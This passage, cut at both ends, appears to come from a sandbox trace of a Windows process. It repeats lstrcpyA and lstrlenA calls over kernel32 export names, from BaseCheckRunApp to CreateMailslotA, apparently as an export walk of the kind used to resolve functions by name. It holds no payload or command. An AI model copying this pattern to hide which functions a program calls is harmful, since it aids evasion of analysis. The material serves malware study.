lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0083.306] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0083.306] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0083.306] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0083.306] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0083.306] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0083.306] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0083.306] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0083.306] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0083.306] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0083.306] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0083.306] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0083.306] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0083.306] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0083.306] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0083.306] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0083.307] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0083.307] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0083.307] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0083.307] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0083.307] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0083.307] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0083.307] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0083.307] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0083.307] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0083.307] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0083.307] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0083.307] lstrlenA (lpString="BEEP") returned 4 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0083.307] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0083.307] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0083.307] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0083.307] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0083.307] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0083.307] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0083.307] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0083.308] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0083.308] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0083.308] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0083.308] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0083.308] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0083.308] lstrlenA (lpString="CANCELIO") returned 8 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0083.308] lstrlenA (lpString="CANCELIOEX") returned 10 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0083.308] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0083.308] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0083.308] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0083.308] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0083.308] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0083.308] lstrlenA (lpString="CHECKELEVATION") returned 14 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0083.308] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0083.308] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0083.308] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0083.308] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0083.308] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0083.308] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0083.309] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0083.309] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0083.309] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0083.309] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0083.309] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0083.309] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0083.309] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0083.309] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0083.309] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0083.309] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0083.309] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0083.309] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0083.309] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0083.309] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0083.310] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0083.310] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0083.310] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0083.310] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0083.310] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0083.310] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0083.310] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0083.310] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0083.310] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0083.310] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0083.310] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0083.310] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0083.310] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0083.310] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0083.310] lstrlenA (lpString="COPYCONTEXT") returned 11 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0083.310] lstrlenA (lpString="COPYFILEA") returned 9 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0083.310] lstrlenA (lpString="COPYFILEEXA") returned 11 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0083.310] lstrlenA (lpString="COPYFILEEXW") returned 11 [0083.310] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0083.310] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0083.311] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0083.311] lstrlenA (lpString="COPYFILEW") returned 9 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0083.311] lstrlenA (lpString="COPYLZFILE") returned 10 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0083.311] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0083.311] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0083.311] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0083.311] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0083.311] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0083.311] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0083.311] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0083.311] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0083.311] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0083.311] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0083.311] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0083.311] lstrlenA (lpString="CREATEEVENTA") returned 12 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0083.311] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0083.311] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0083.311] lstrlenA (lpString="CREATEEVENTW") returned 12 [0083.311] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0083.312] lstrlenA (lpString="CREATEFIBER") returned 11 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0083.312] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0083.312] lstrlenA (lpString="CREATEFILEA") returned 11 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0083.312] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0083.312] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0083.312] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0083.312] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0083.312] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0083.312] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0083.312] lstrlenA (lpString="CREATEFILEW") returned 11 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.312] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.312] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.312] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.312] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.312] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.312] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.312] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.312] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.312] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.313] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.313] lstrcpyA (in: 